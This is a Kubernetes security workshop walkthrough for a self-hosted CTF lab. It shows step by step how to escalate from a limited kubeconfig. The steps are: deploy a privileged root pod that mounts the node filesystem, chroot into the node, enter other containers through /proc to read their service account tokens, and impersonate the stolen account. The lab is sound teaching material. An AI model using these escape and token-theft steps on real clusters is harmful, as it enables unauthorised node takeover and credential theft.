
Welcome to the workshop :)

All you’ll need to get involved is:

  • kubectl

(Optional) Creating the lab


  • Vagrant
  • Virtualbox
  • A stable internet connection

The project is located here.

Use vagrant to create the machines:

vagrant up
vagrant ssh kubemaster

Run two deploy scripts to join the two nodes to the cluster, and set-up the lab:

sh deploy.sh
cd kubernetes-workshop
sh deploy.sh

Getting connected to the lab

The lab defines a socks proxy that allows us to connect to resources via the kubemaster machine. You’ll need to keep the HTTPS_PROXY environment variable populated with the socks proxy. kubectl ignores proxychains (tell me about it), so you’ll need to do it this way:

export HTTPS_PROXY=socks5://ip.of.machine.hosting:1080

This IP address will be if you self-host the lab, but if you are connecting to another instance then you should put the IP of the machine hosting the cluster. (i.e. this should be provided to you).

If you are self-deploying, during the last step of deploying demo-vulnerable-path you should see:

http://ip.goes.here.plz:8080/ to get your config, and off you go!

Take note of this, it’s where you’ll get your first starting kubeconfig.

If you are working in someone else’s lab environment, then this URL should also be provided.


The lab environment consists of three nodes:

  • kubemaster
  • kubenode01
  • kubenode02

Starting with a limited access Kubernetes config, your goal is to escalate privileges and access the system-manager-configuration secret. Along the path to this there are a number of flags, which require you to:

  • Connect and communicate with the cluster, and retrieve a secret
  • Deploy a malicious pod to take control of a node
  • Explore running containers on nodes to discover service accounts
  • Explore the cluster as a service account to find the final flag

Two additional flags are also available for those that look into the container registry 👀.

Now if you don’t want any spoilers and just want to give it a go…

Spoilers ahead

Connect and communicate

To retrieve our initial kubeconfig:

curl ip.goes.here.plz:8080 > kubeconfig #the IP _should_ be

We can then use this config with kubectl:

kubectl --kubeconfig=kubeconfig version

Rather then having to type --kubeconfig= all the time, we can opt to move this file so that it’s our user’s Kubernetes configuration:

mkdir -p ~/.kube/
mv kubeconfig ~/.kube/config

Just don’t overwrite your production config if you already use K8S!

Now, let’s use this to investigate!

Let’s see what our permissions are:

kubectl auth can-i --list

Alright, let’s check out secrets!

kubectl get secrets
NAME             TYPE                                  DATA   AGE
dev-user-token   kubernetes.io/service-account-token   3      19m
first-flag       Opaque                                1      19m

Well, one of these looks relevant!

kubectl get secret first-flag -o json

Surely you can figure out the incredibly complex encryption! (CyberChef is always a help).

Bad PODs

Alright, from here we are really going to get into the weeds. Feel free to ask lots of questions, because this part is going to assume you know quite a bit about containers and how they work under the hood, as well as Linux.

Okay, so our restricted user has access to create pods in our namespace, so let’s create a mallicious pod and get more access.

When creating our bad pod, we should really try and use images that already exist in the cluster. So what should we use, well let’s see if we can view any existing pods:

kubectl get pods
NAME                     READY   STATUS    RESTARTS   AGE
dev-space-key-provider   1/1     Running   0          9m27s
test-box                 1/1     Running   0          9m27s
kubectl describe pod test-box

In here we can find:


That sounds handy, (also, that looks like a local registry 👀), lets use it!

Let’s make a pod that is a single container that:

  • Runs as root
  • Mounts the node it’s run on

We can then use archaic Linux magic (chroot) to start playing with the node!

Lets make a pod config file, maybe our_cool_pod.yaml, and push it into the cluster:

apiVersion: v1
kind: Pod
  name: put-your-own-name-here-or-ill-find-you
    cool: labels
    are: cool
  hostNetwork: true #
  hostPID: true     # If you want systemctl or ps to work, these are important
  hostIPC: true     #
  - name: super-cool-normal-pod
      privileged: true
      runAsUser: 0
      runAsGroup: 0
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ] # Keep our pod alive!
    kubernetes.io/hostname: kubenode01 # Optional, but do this ;)
  - name: noderoot
      path: /
kubectl apply -f our_cool_pod.yaml

Let’s check on our pod and see if it’s up and running:

kubectl get pod put-your-own-name-here-or-ill-find-you
NAME                                     READY   STATUS    RESTARTS   AGE
put-your-own-name-here-or-ill-find-you   1/1     Running   0          4s

Now let’s jump into it!

kubectl exec put-your-own-name-here-or-ill-find-you -it -- /bin/sh

Cool, this is our container, and if we navigate to /host we’ll see the filesystem of the node. Since our UID and GID match all of the files (we’re root), we can read and edit any of the files on the node! Maybe there’s a file here you can spot ;).

Alright, that’s great, but we kind of want to be able to run commands on our node… do we need to set up a reverse shell or something? no! chroot to the rescue:

chroot /host /bin/bash

Moving around a node

Alright, our node is running other workloads right? from other namespaces! Well, this is where we can use some sneaky tricks:

By default, the default service account for a namespace is mounted inside a container, so if we do:

echo $(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)

We can find out what namespace a pod is being run in.

Secondly, since we are on the node now, we can look at all the pids being run by the container runtime… which is uh…

ps aux
root ... /usr/bin/crun --root /run/runc --systemd-c

CRUN! It’s CRUN! with a slightly different root folder? weird. Okay let’s see what containers are running

crun --root /run/runc list

Now I’m not going to put the output here… but it’s a lot and it’s mostly useless, the important part is that we can see the PIDs of containers though (using crun --root /run/runc list | cut -d$' ' -f 2 for all you bash lovers):


Now, containers are just processes that are told to use a different root folder, and operated using managed resources. Where does Linux store these file systems though? well…:


Yup, it stores them in a folder called root in the /proc/ fs. Okay so we know that each of these is a pod, that has an auto mounted service account token…

echo $(cat /proc/2001/root/var/run/secrets/kubernetes.io/serviceaccount/namespace)

Cool, we have a way to figure out which pods belong to which namespaces. Eventually, you’ll find an interesting pod:

echo $(cat /proc/2353/root/var/run/secrets/kubernetes.io/serviceaccount/namespace)

This container looks exciting, let’s take a closer look… by chrooting in ;)

chroot /proc/2353/root
cat /etc/hostname

Okay, well, rancher is used to configure other services, sometimes even Kubernetes, so maybe this container has:

  • A mounted secret
  • A secret given to the process
  • A privileged Kubernetes service account

Let’s go through and check one by one:

/ # mount
mount: no /proc/mounts

Okay… no easy way to find out mounts.

/ # ps
1     tc       /bin/sh -c -- while true; do sleep 30; done;

Alright the main process PID is 1, let’s check out the environ:

/ # cat /proc/1/environ | tr '\0' '\n'

Okay, nothing too interesting there. Let’s check out the service account.

Let’s take a look at the token (stored in /var/run/secrets/kubernetes.io/serviceaccount/token) in a JWT decoder like https://jwt.io/.

  "aud": [
  "exp": 1732189135,
  "iat": 1700653135,
  "iss": "https://kubernetes.default.svc.cluster.local",
  "kubernetes.io": {
    "namespace": "system-manager",
    "pod": {
      "name": "something-like-rancher",
      "uid": "64b447cd-275a-428b-b6da-a0cfde91acaf"
    "serviceaccount": {
      "name": "manager",
      "uid": "3eac23fd-c9fe-4a43-8368-25066d7629b0"
    "warnafter": 1700656742
  "nbf": 1700653135,
  "sub": "system:serviceaccount:system-manager:manager"

Okay well I can confirm that the service account name manager is definitely not standard, so maybe it has permissions.

Impersonating a service account

Let’s craft a new Kubernetes config, sa-config that we can use to authenticate as this service account. We can model it off our existing one, with a few small tweaks:

# ...
- context:
    cluster: mycluster
    namespace: system-manager
    user: manager
  name: system-manager

current-context: system-manager
kind: Config
preferences: {}

- name: manager
    token: the-token-from-/var/run/secrets/kubernetes.io/serviceaccount/token
kubectl --kubeconfig=sa-config get pod

From here, the final flag is within grasp. Think about what new resources could this service account have access to that we want?

Good luck, and thanks for giving the workshop lab a go!

Container registry flags

I’m going to leave this mostly as a bonus challenge for you to figure out, just look at the /etc/containers/registries.conf.d/ folder on one of the nodes within the cluster to start your journey.

If you get stuck on the second container, check out:

Good luck!